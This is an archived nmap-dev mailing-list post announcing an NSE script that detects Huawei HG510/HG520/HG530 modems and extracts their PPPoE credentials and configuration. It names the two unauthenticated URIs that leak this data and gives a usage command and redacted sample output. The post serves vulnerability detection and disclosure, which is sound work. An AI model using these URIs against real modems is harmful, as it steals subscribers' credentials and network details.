Home page logo
/

nmap-dev logo Nmap Development mailing list archives

NSE: Credential disclosure in modems Huawei HG510, HG520x, HG530 and possibly others
From: Paulino Calderon <paulino () calderonpale com>
Date: Thu, 17 May 2012 20:03:20 -0500

Hi list,

Here is my NSE script for detecting and extracting information from vulnerable Huawei modems. I know that these modems are popular in México (Over 2 million devices here), Spain, Italy, Ecuador and other countries in south america but let me know if you know other ISPs using them. I also know Colombia have a lot of them but they have patched versions over there. This vulnerability was reported a long time ago but ISPs don't seem interested in fixing it any time soon.

description = [[
Detects Huawei modems models HG530x, HG520x, HG510x and possibly others that are vulnerable to a remote credential and information disclosure vulnerability. It also extracts the PPPoE credentials
and other interesting configuration values.

Attackers can query the URIs "/Listadeparametros.html" and "/wanfun.js" to extract sensitive information including PPPoE credentials, firmware version, model, gateway, dns servers and active connections among other values.

This vulnerability was discovered and reported by Adiaz from Comunidad Underground de Mexico (http://underground.org.mx).
]]

---
-- @usage nmap -p80 --script huawei-ppp-pwd.nse <target>
-- @usage nmap -sV huawei-ppp-pwd.nse <target>
--
-- @output
-- PORT   STATE SERVICE VERSION
-- 80/tcp open  http    Allegro RomPager 4.07 UPnP/1.0 (ZyXEL ZyWALL 2)
-- | huawei-ppp-pwd:
-- |   VULNERABLE:
-- |   Remote credential and information disclosure in modems Huawei HG5XX
-- |     State: VULNERABLE (Exploitable)
-- |     Description:
-- | Modems Huawei 530x, 520x and possibly others are vulnerable to remote credential and information disclosure. -- | Attackers can query the URIs "/Listadeparametros.html" and "/wanfun.js" to extract sensitive information -- | including PPPoE credentials, firmware version, model, gateway, dns servers, active connections among other network information
-- |     Disclosure date: 2011-01-1
-- |     Extra information:
-- |
-- |   PPPoE username:<removed>
-- |   PPoE password:<removed>
-- |   Model:EchoLife HG530
-- |   Firmware version:V100R001B122gTelmex
-- |   External IP:<removed>
-- |   Gateway IP:<removed>
-- |   DNS 1:200.33.146.249
-- |   DNS 2:200.33.146.241
-- |   Network segment:192.168.1.0
-- |   Active ethernet connections:0
-- |   Active wireless connections:2
-- |   BSSID:0xdeadbeefcafe
-- |   Wireless Encryption (Boolean):1
-- |     References:
-- |_      http://routerpwn.com/#huawei
---

Cheers!

--
Paulino Calderón Pale
Website: http://calderonpale.com
Twitter: http://twitter.com/calderpwn

Attachment: huawei-hg5xx-info.nse
Description:

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault